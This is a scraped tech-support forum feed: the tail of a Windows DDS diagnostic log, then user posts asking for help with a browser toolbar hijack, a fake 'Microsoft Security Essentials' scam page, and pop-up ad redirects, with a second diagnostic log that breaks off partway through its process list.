2016-10-25 07:39:36 306840 ----a-w- c:\windows\system32\wlanapi.dll
2016-10-25 07:37:48 980352 ----a-w- c:\windows\system32\mfasfsrcsnk.dll
2016-10-25 07:37:46 882720 ----a-w- c:\windows\system32\mfmp4srcsnk.dll
2016-10-25 07:37:42 895080 ----a-w- c:\windows\system32\mfsrcsnk.dll
2016-10-25 07:37:42 709176 ----a-w- c:\windows\system32\mfsvr.dll
2016-10-25 07:37:19 1349632 ----a-w- c:\windows\system32\winmde.dll
2016-10-25 07:37:17 1334680 ----a-w- c:\windows\system32\wmpmde.dll
2016-10-25 07:31:30 957608 ----a-w- c:\windows\system32\ole32.dll
2016-10-25 07:31:28 1824272 ----a-w- c:\windows\system32\combase.dll
2016-10-25 07:30:45 703840 ----a-w- c:\windows\system32\WWAHost.exe
2016-10-25 07:28:10 1300016 ----a-w- c:\windows\system32\WpcMon.exe
2016-10-25 07:27:39 613120 ----a-w- c:\windows\system32\Windows.Internal.Shell.Broker.dll
2016-10-25 07:27:31 305304 ----a-w- c:\windows\system32\SystemSettingsAdminFlows.exe
2016-10-25 07:27:27 465760 ----a-w- c:\windows\system32\SettingSyncHost.exe
2016-10-25 07:26:30 569752 ----a-w- c:\windows\system32\SHCore.dll
2016-10-25 07:26:27 836752 ----a-w- c:\windows\system32\twinapi.appcore.dll
2016-10-25 07:26:27 5240952 ----a-w- c:\windows\system32\windows.storage.dll
2016-10-25 07:26:26 4074160 ----a-w- c:\windows\explorer.exe
2016-10-25 07:26:19 1355344 ----a-w- c:\windows\system32\propsys.dll
2016-10-25 07:25:33 633192 ----a-w- c:\windows\system32\sppwinob.dll
2016-10-25 07:25:21 1337680 ----a-w- c:\windows\system32\sppobjs.dll
2016-10-25 07:24:26 5598832 ----a-w- c:\windows\system32\sppsvc.exe
2016-10-25 07:23:20 995288 ----a-w- c:\windows\system32\ClipUp.exe
2016-10-25 07:23:00 510872 ----a-w- c:\windows\system32\ClipSVC.dll
2016-10-25 07:22:22 505136 ----a-w- c:\windows\system32\drivers\cng.sys
2016-10-25 07:22:16 268040 ----a-w- c:\windows\system32\wintrust.dll
2016-10-25 07:19:07 295776 ----a-w- c:\windows\system32\msv1_0.dll
2016-10-25 06:58:23 536416 ----a-w- c:\windows\system32\drivers\vhdmp.sys
2016-10-25 06:56:06 2195640 ----a-w- c:\windows\system32\d3d10warp.dll
2016-10-25 06:55:58 1712992 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2016-10-25 06:55:51 484704 ----a-w- c:\windows\system32\drivers\dxgmms2.sys
2016-10-25 06:55:49 336736 ----a-w- c:\windows\system32\drivers\dxgmms1.sys
2016-10-25 06:54:31 273760 ----a-w- c:\windows\system32\input.dll
2016-10-25 06:54:29 1522160 ----a-w- c:\windows\system32\WindowsCodecs.dll
2016-10-25 06:53:59 1174008 ----a-w- c:\windows\system32\msctf.dll
2016-10-25 06:39:08 403920 ----a-w- c:\windows\system32\DMRServer.dll
2016-10-25 06:38:37 25952 ----a-w- c:\windows\system32\drivers\usbd.sys
2016-10-25 06:27:45 72192 ----a-w- c:\windows\system32\rdpudd.dll
2016-10-25 06:27:24 74752 ----a-w- c:\windows\system32\MapsCSP.dll
2016-10-25 06:26:27 88576 ----a-w- c:\windows\system32\olepro32.dll
2016-10-25 06:23:27 239616 ----a-w- c:\windows\system32\wcl.dll
2016-10-25 06:21:25 50176 ----a-w- c:\windows\system32\MosHostClient.dll
2016-10-25 06:19:36 17408 ----a-w- c:\windows\system32\drivers\genericusbfn.sys
2016-10-25 06:19:14 572928 ----a-w- c:\windows\system32\WpcWebFilter.dll
2016-10-25 06:18:18 299008 ----a-w- c:\windows\system32\microsoft-windows-system-events.dll
2016-10-25 06:18:08 25600 ----a-w- c:\windows\system32\odbcconf.dll
2016-10-25 06:13:50 37376 ----a-w- c:\windows\system32\musdialoghandlers.dll
2016-10-25 06:12:26 81408 ----a-w- c:\windows\system32\drivers\bowser.sys
2016-10-25 06:11:22 23552 ----a-w- c:\windows\system32\mapsupdatetask.dll
2016-10-25 06:10:05 33792 ----a-w- c:\windows\system32\drivers\BthAvrcpTg.sys
2016-10-25 06:09:36 584704 ----a-w- c:\windows\system32\UIRibbonRes.dll
2016-10-25 06:09:20 65536 ----a-w- c:\windows\system32\wininetlui.dll
2016-10-25 06:08:31 59904 ----a-w- c:\windows\system32\MosStorage.dll
2016-10-25 06:07:45 35328 ----a-w- c:\windows\system32\drivers\scfilter.sys
2016-10-25 06:06:55 87040 ----a-w- c:\windows\system32\MapsBtSvc.dll
2016-10-25 06:05:46 78848 ----a-w- c:\windows\system32\asycfilt.dll
2016-10-25 06:03:37 38912 ----a-w- c:\windows\system32\TpmTasks.dll
2016-10-25 06:03:14 69632 ----a-w- c:\windows\system32\SCardDlg.dll
2016-10-25 06:03:14 64512 ----a-w- c:\windows\system32\MshtmlDac.dll
2016-10-25 06:02:58 38400 ----a-w- c:\windows\system32\HttpsDataSource.dll
2016-10-25 06:02:33 54784 ----a-w- c:\windows\system32\moshost.dll
2016-10-25 06:02:26 68096 ----a-w- c:\windows\system32\drivers\hdaudbus.sys
2016-10-25 06:01:41 183296 ----a-w- c:\windows\system32\NPSMDesktopProvider.dll
2016-10-25 06:00:34 115200 ----a-w- c:\windows\system32\PortableDeviceClassExtension.dll
2016-10-25 06:00:23 256512 ----a-w- c:\windows\system32\unimdm.tsp
2016-10-25 06:00:22 177664 ----a-w- c:\windows\system32\hgprint.dll
2016-10-25 06:00:06 102912 ----a-w- c:\windows\system32\NPSM.dll
2016-10-25 05:59:41 205312 ----a-w- c:\windows\system32\oemlicense.dll
2016-10-25 05:58:47 165376 ----a-w- c:\windows\system32\drivers\ndiswan.sys
2016-10-25 05:57:04 267776 ----a-w- c:\windows\system32\usocore.dll
2016-10-25 05:56:53 59904 ----a-w- c:\windows\system32\PortableDeviceConnectApi.dll
2016-10-25 05:56:17 203776 ----a-w- c:\windows\system32\moshostcore.dll
2016-10-25 05:54:08 92160 ----a-w- c:\windows\system32\IdCtrls.dll
2016-10-25 05:54:08 2478592 ----a-w- c:\windows\apppatch\AcGenral.dll
.
============= FINISH: 15:38:55.96 ===============

then the attach one.. .
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 10 Pro
Boot Device: \Device\HarddiskVolume1
Install Date: 22/05/2016 4:14:26 PM
System Uptime: 11/11/2016 10:59:33 PM (41 hours ago)
.
Motherboard: Hewlett-Packard | | 3031h
Processor: Intel(R) Core(TM)2 Duo CPU E8500 @ 3.16GHz | XU1 PROCESSOR | 3166/1333mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 465 GiB total, 432.13 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID: {4d36e96b-e325-11ce-bfc1-08002be10318}
Description: Standard PS/2 Keyboard
Device ID: ACPI\PNP0303\4&3084B1C&0
Manufacturer: (Standard keyboards)
Name: Standard PS/2 Keyboard
PNP Device ID: ACPI\PNP0303\4&3084B1C&0
Service: i8042prt
.
Class GUID:
Description: PCI Serial Port
Device ID: PCI\VEN_8086&DEV_2E17&SUBSYS_3034103C&REV_03\3&B1BFB68&0&1B
Manufacturer:
Name: PCI Serial Port
PNP Device ID: PCI\VEN_8086&DEV_2E17&SUBSYS_3034103C&REV_03\3&B1BFB68&0&1B
Service:
.
Class GUID: {4d36e96f-e325-11ce-bfc1-08002be10318}
Description: PS/2 Compatible Mouse
Device ID: ACPI\PNP0F13\4&3084B1C&0
Manufacturer: Microsoft
Name: PS/2 Compatible Mouse
PNP Device ID: ACPI\PNP0F13\4&3084B1C&0
Service: i8042prt
.
==== System Restore Points ===================
.
RP33: 27/10/2016 8:33:39 PM - ASU_MSI_TRAN
RP34: 6/11/2016 11:01:44 PM - Scheduled Checkpoint
RP35: 10/11/2016 11:03:13 PM - Windows Update
.
==== Installed Programs ======================
.
Adobe Flash Player 23 NPAPI
Amazon Kindle
Avast Premier
CCleaner
FamilySearch Indexing 3.27.7
HP Customer Experience Enhancements
HP DeskJet 3630 series Basic Device Software
HP DeskJet 3630 series Help
HP Dropbox Plugin
HP Google Drive Plugin
HP Photo Creations
HP Support Assistant
HP Support Solutions Framework
HP Update
IrfanView (remove only)
Legacy 8.0
Microsoft Office 365 - en-us
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Mozilla Firefox 49.0.2 (x86 en-US)
Mozilla Maintenance Service
Mozilla Thunderbird 45.4.0 (x86 en-US)
NETGEAR WNA3100 wireless USB 2.0 adapter
Office 16 Click-to-Run Extensibility Component
Office 16 Click-to-Run Licensing Component
Office 16 Click-to-Run Localization Component
SafeZone Stable 1.51.2220.62
Skype 7.29
Windows Live Toolbar
.
==== Event Viewer Messages From Past Week ========
.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The User Data Storage_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The User Data Access_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The Sync Host_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 8:53:20 AM, Error: Service Control Manager [7031] - The Contact Data_1693e6f4 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:20 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the User Data Storage_1434c2c8 service to connect.
9/11/2016 1:37:20 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the Sync Host_1434c2c8 service to connect.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The User Data Storage_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The User Data Access_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The Sync Host_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
9/11/2016 1:37:10 AM, Error: Service Control Manager [7031] - The Contact Data_1434c2c8 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 2:52:56 PM, Error: Service Control Manager [7031] - The User Data Storage_130d77ba service terminated unexpectedly. It has done this 2 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 2:52:55 PM, Error: Service Control Manager [7023] - The User Data Access_130d77ba service terminated with the following error: Class not registered
8/11/2016 2:52:53 PM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the Sync Host_130d77ba service to connect.
8/11/2016 2:52:43 PM, Error: Service Control Manager [7031] - The User Data Storage_130d77ba service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 2:52:43 PM, Error: Service Control Manager [7031] - The User Data Access_130d77ba service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 2:52:43 PM, Error: Service Control Manager [7031] - The Sync Host_130d77ba service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 2:52:43 PM, Error: Service Control Manager [7031] - The Contact Data_130d77ba service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 12:02:35 AM, Error: Service Control Manager [7031] - The User Data Storage_10e4f38e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 12:02:35 AM, Error: Service Control Manager [7031] - The User Data Access_10e4f38e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 12:02:35 AM, Error: Service Control Manager [7031] - The Sync Host_10e4f38e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
8/11/2016 12:02:35 AM, Error: Service Control Manager [7031] - The Contact Data_10e4f38e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 8:23:30 PM, Error: Service Control Manager [7031] - The Superfetch service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
7/11/2016 3:48:21 PM, Error: Service Control Manager [7031] - The User Data Storage_f93e926 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 3:48:21 PM, Error: Service Control Manager [7031] - The User Data Access_f93e926 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 3:48:21 PM, Error: Service Control Manager [7031] - The Sync Host_f93e926 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 3:48:21 PM, Error: Service Control Manager [7031] - The Contact Data_f93e926 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 12:56:56 AM, Error: Service Control Manager [7031] - The User Data Storage_be9673f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 12:56:56 AM, Error: Service Control Manager [7031] - The User Data Access_be9673f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 12:56:56 AM, Error: Service Control Manager [7031] - The Sync Host_be9673f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
7/11/2016 12:56:56 AM, Error: Service Control Manager [7031] - The Contact Data_be9673f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
6/11/2016 1:44:34 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the User Data Storage_965e01e service to connect.
6/11/2016 1:44:34 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the Sync Host_965e01e service to connect.
6/11/2016 1:44:24 AM, Error: Service Control Manager [7031] - The User Data Storage_965e01e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
6/11/2016 1:44:24 AM, Error: Service Control Manager [7031] - The User Data Access_965e01e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
6/11/2016 1:44:24 AM, Error: Service Control Manager [7031] - The Sync Host_965e01e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
6/11/2016 1:44:24 AM, Error: Service Control Manager [7031] - The Contact Data_965e01e service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
13/11/2016 2:28:52 PM, Error: Microsoft-Windows-DistributedCOM [10016] - The machine-default permission settings do not grant Local Activation permission for the COM Server application with CLSID {C2F03A33-21F5-47FA-B4BB-156362A2F239} and APPID {316CDED5-E4AE-4B15-9113-7055D84DCC97} to the user DESKTOP-5KFHTUH\Lorraine SID (S-1-5-21-395152712-2620477987-3300426641-1001) from address LocalHost (Using LRPC) running in the application container Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewy SID (S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742). This security permission can be modified using the Component Services administrative tool.
13/11/2016 1:27:33 AM, Error: Service Control Manager [7031] - The User Data Storage_b53675 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
13/11/2016 1:27:33 AM, Error: Service Control Manager [7031] - The User Data Access_b53675 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
13/11/2016 1:27:33 AM, Error: Service Control Manager [7031] - The Sync Host_b53675 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
13/11/2016 1:27:33 AM, Error: Service Control Manager [7031] - The Contact Data_b53675 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
12/11/2016 12:41:33 AM, Error: Service Control Manager [7031] - The User Data Storage_2df17 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
12/11/2016 12:41:33 AM, Error: Service Control Manager [7031] - The User Data Access_2df17 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
12/11/2016 12:41:33 AM, Error: Service Control Manager [7031] - The Sync Host_2df17 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
12/11/2016 12:41:33 AM, Error: Service Control Manager [7031] - The Contact Data_2df17 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
12/11/2016 11:03:25 PM, Error: Ntfs [55] - A corruption was discovered in the file system structure on volume ??. The Master File Table (MFT) contains a corrupted file record. The file reference number is 0x9000000000009. The name of the file is "<unable to determine file name>".
11/11/2016 10:58:57 PM, Error: Service Control Manager [7031] - The User Data Storage_38d4a6d service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 10:58:57 PM, Error: Service Control Manager [7031] - The User Data Access_38d4a6d service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 10:58:57 PM, Error: Service Control Manager [7031] - The Sync Host_38d4a6d service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 10:58:57 PM, Error: Service Control Manager [7031] - The Contact Data_38d4a6d service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 10:58:14 PM, Error: Service Control Manager [7032] - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: An instance of the service is already running.
11/11/2016 10:57:44 PM, Error: Service Control Manager [7034] - The HP Support Solutions Framework Service service terminated unexpectedly. It has done this 1 time(s).
11/11/2016 10:57:44 PM, Error: Service Control Manager [7034] - The HP CASL Framework Service service terminated unexpectedly. It has done this 1 time(s).
11/11/2016 10:57:44 PM, Error: Service Control Manager [7031] - The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
11/11/2016 10:57:42 PM, Error: Service Control Manager [7031] - The Print Spooler service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 5000 milliseconds: Restart the service.
11/11/2016 10:57:42 PM, Error: Service Control Manager [7031] - The Microsoft Office Click-to-Run Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 0 milliseconds: Restart the service.
11/11/2016 1:12:37 AM, Error: Service Control Manager [7031] - The User Data Storage_1f46f7c service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 1:12:37 AM, Error: Service Control Manager [7031] - The User Data Access_1f46f7c service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 1:12:37 AM, Error: Service Control Manager [7031] - The Sync Host_1f46f7c service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
11/11/2016 1:12:37 AM, Error: Service Control Manager [7031] - The Contact Data_1f46f7c service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 7:44:03 AM, Error: Microsoft-Windows-Eventlog [30] - The event logging service encountered an error (5) while enabling publisher {0BF2FB94-7B60-4B4D-9766-E82F658DF540} to channel Microsoft-Windows-Kernel-ShimEngine/Operational. This does not affect channel operation, but does affect the ability of the publisher to raise events to the channel. One common reason for this error is that the Provider is using ETW Provider Security and has not granted enable permissions to the Event Log service identity.
10/11/2016 5:23:28 PM, Error: Service Control Manager [7031] - The User Data Storage_13f19ee service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 5:23:28 PM, Error: Service Control Manager [7031] - The User Data Access_13f19ee service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 5:23:28 PM, Error: Service Control Manager [7031] - The Sync Host_13f19ee service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 5:23:28 PM, Error: Service Control Manager [7031] - The Contact Data_13f19ee service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 2:05:08 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the User Data Storage_4c14b service to connect.
10/11/2016 2:05:08 AM, Error: Service Control Manager [7009] - A timeout was reached (30000 milliseconds) while waiting for the Sync Host_4c14b service to connect.
10/11/2016 2:04:58 AM, Error: Service Control Manager [7031] - The User Data Storage_4c14b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 2:04:58 AM, Error: Service Control Manager [7031] - The User Data Access_4c14b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 2:04:58 AM, Error: Service Control Manager [7031] - The Sync Host_4c14b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 2:04:58 AM, Error: Service Control Manager [7031] - The Contact Data_4c14b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 12:15:41 PM, Error: Service Control Manager [7031] - The User Data Storage_cfd9b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 12:15:41 PM, Error: Service Control Manager [7031] - The User Data Access_cfd9b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 12:15:41 PM, Error: Service Control Manager [7031] - The Sync Host_cfd9b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
10/11/2016 12:15:41 PM, Error: Service Control Manager [7031] - The Contact Data_cfd9b service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.
.
==== End Of File ===========================

↧

Remove unwanted yahoo toolbar

November 16, 2016, 12:35 am

≫ Next: Ransomware in Firefox

≪ Previous: Help with removing malaware ?

I recently got this unwanted yahoo toolbar on chrome even though it has no extension and the default search is google. I tried uninstalling youtube downloader which I assume has started it. I ran windows defender, avast anti virus ran mrt command and yet no malware is detected. I uninstalled and reinstalled chrome. Yet, its still there. Please help me with this. It is right below the bookmarks and is very irritating. The search in google search box is also redirected to this tool bar and starts yahoo search.

Attached Thumbnails

Click image for larger version

Name: Capture.PNG
Views: N/A
Size: 34.4 KB
ID: 296113

↧

Ransomware in Firefox

November 26, 2016, 10:55 am

≫ Next: Pop up ad problem Firefox Chrome and Edge probably

≪ Previous: Remove unwanted yahoo toolbar

I think I just got hit with ransomware in my browser this morning.

I use Firefox in a five-months-old laptop running Windows 10. I clicked on a link in a Google search (and I honestly can't remember what it was now but it was to do with Excel VBA coding) and I get a new tab in my browser which was headed 'Microsoft Security Essentials'. Almost immediately a computer-voice starts up telling me I have a virus and to phone the number on the screen to 'help' me remove it. The number was a toll-free 0800 number in the USA. I live in the UK. The sneaky thing is that they also placed a dialog box on the window asking for a username and password (for what purpose it did not say) with OK and Cancel buttons. Hitting the Cancel (or the Escape key) just caused the dialog box to reappear. This obviously locked my entire Firefox session and other tabs were inaccessible. None of the normal Close Window options would work so the session was stuck.

In the main page there was what looked (as I subsequently found) to all the world like a real Security Essentials screen with all the right layout and colours etc. I had never actually heard of Security Essentials before and I discovered through using another browser (Chrome, which was not affected) that it doesn't actually run under Windows 10. On further looking at the page it became apparent that the message - much the same as the voiceover - was written by someone whose first language was not English. The implications of the text were that any banking apps on my computer had been compromised.

I'm guessing that if I did call the number from across the Atlantic they would demand money and may or may not 'fix' my computer.

I closed Firefox with Task Manger but on re-starting it the rogue page obviously reappeared as I have it set to re-open the tabs that were open when it was closed. I managed to get rid of it though. From Chrome I started something that required a new tab to be opened in my default browser, which is Firefox. Since FF was closed at the time it got fired up and it opened the requested page. Fortunately FF went into it's 'Well, this is embarrassing' routine and failed to open any of the old tabs, giving the list it thought it had before. I unticked the rogue page, clicked go and everything opened as normal.

What this long-winded introduction is coming to is this: Am I really infected with anything and are my bank and card accounts really compromised? I have run full scans using IOBit's Malware Fighter, AVG and Malwarebytes Anti-Malware and they did not report anything that looked remotely connected (basically just a few cookies and something to do with an Amazon button). I try to keep a clean machine and run Malware Fighter regularly. I downloaded the Malwarebytes specially for this. I am up to date with Windows and other Microsoft updates (e.g. Office). Should I change all my financially-connected passwords? I haven't been into any of them since this episode yet.

I'm sorry I should have thought to take a screen-grab of the dodgy page as it might have been useful for others to see but it didn't occur to me at the time in my panic to get rid of it. However, I took a note of the URL and it is (preceded by http://) z13xx03-virus.com/en/?id=MDgwMCAwODYgOTgyOA. I provide this just in case anyone recognises it - ON NO ACCOUNT OPEN IT!!

I hope someone can advise.

Bill

↧

Pop up ad problem Firefox Chrome and Edge probably

November 26, 2016, 6:51 pm

≫ Next: I can get rid of this pop up browser bar ive tried everything i know

≪ Previous: Ransomware in Firefox

I have a problem with pop up ads where when a pop up sometimes occurs it redirects to unwanted ads not where it supposed to pop up to. I know this came from a free download I did and even though I realized fairly quickly what it was it got on my system and infected it. It has installed something somewhere that causes redirection of pop ups.

I have done all normal advertised steps and repeated:

AdwCleaner

Malwarebytes Anti-Malware Free

HitmanPro

Reset browsers to default and rebooted.

I think these programs and steps have done something but something is still present as sometimes when a pop up occurs it redirects to unwanted ads. Probably making a new user would solve I think but would be good to solve it on this user. I know if the right file was deleted it would be gone but I do not know where it is and I am running out of steps to follow.

Anyone have some experience with where it might be and how to remove it? Thank you in advance.

Here is what I was advised to provide to you:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.14393.0 BrowserJavaVersion: 11.111.2
Run by theun at 2:44:34 on 2016-11-27
Microsoft Windows 10 Pro 10.0.14393.0.1252.44.1033.18.3918.1000 [GMT 0:00]
.
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG AntiVirus Free Edition *Enabled/Updated* {4D41356F-32AD-7C42-C820-63775EE4F413}
SP: Spybot - Search and Destroy *Enabled/Updated* {A16C3F68-9280-E053-1818-342707FECF4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AVG AntiVirus Free Edition *Enabled/Updated* {F620D48B-1497-73CC-F290-58052563BEAE}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
C:\Program Files (x86)\AVG\Av\avgwdsvca.exe
C:\WINDOWS\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\Program Files\Common Files\Nitro PDF\Professional\7.0\NitroPDFDriverService2x64.exe
C:\Windows\SysWOW64\NLSSRV32.EXE
C:\WINDOWS\system32\mqsvc.exe
C:\Windows\SysWOW64\IoctlSvc.exe
